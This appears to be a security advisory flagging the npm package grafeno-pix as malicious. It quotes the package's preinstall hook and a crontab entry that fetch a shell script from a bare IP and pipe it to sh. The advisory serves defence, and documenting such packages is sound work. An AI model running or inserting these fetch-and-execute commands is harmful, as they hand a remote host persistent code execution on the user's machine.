MAL-2026-15507
Malicious code in grafeno-pix (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (a5c5e1649c30ab63a97fde3073d5e838ea91f5b2eca8149242f0fb24e286c3f3) grafeno-pix@1.0.0 declares a preinstall hook that runs `curl -s 216.126.236.46/x.sh | sh`, fetching a shell script from a bare IP over plain HTTP and executing it as the installer on `npm install`. The same hook installs a crontab entry (`*/30 * * * * curl -s 216.126.236.46/x.sh | sh`) that re-fetches and executes the remote script every 30 minutes, providing persistent remote code delivery to the installer's host. The endpoint is an anonymous bare-IP address unrelated to any package publisher and the fetched content is unpinned and integrity-unchecked, so whatever bytes 216.126.236.46 returns run as the user performing the install, indefinitely.
## Source: ossf-package-analysis (e991c3c85e0ddf3403892cc87f458dc91d6a8c2d1da6cca375034c1a0857e584) The OpenSSF Package Analysis project identified 'grafeno-pix' @ 1.0.1 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for grafeno-pix (npm). Pin to a known-safe version or switch to an alternative.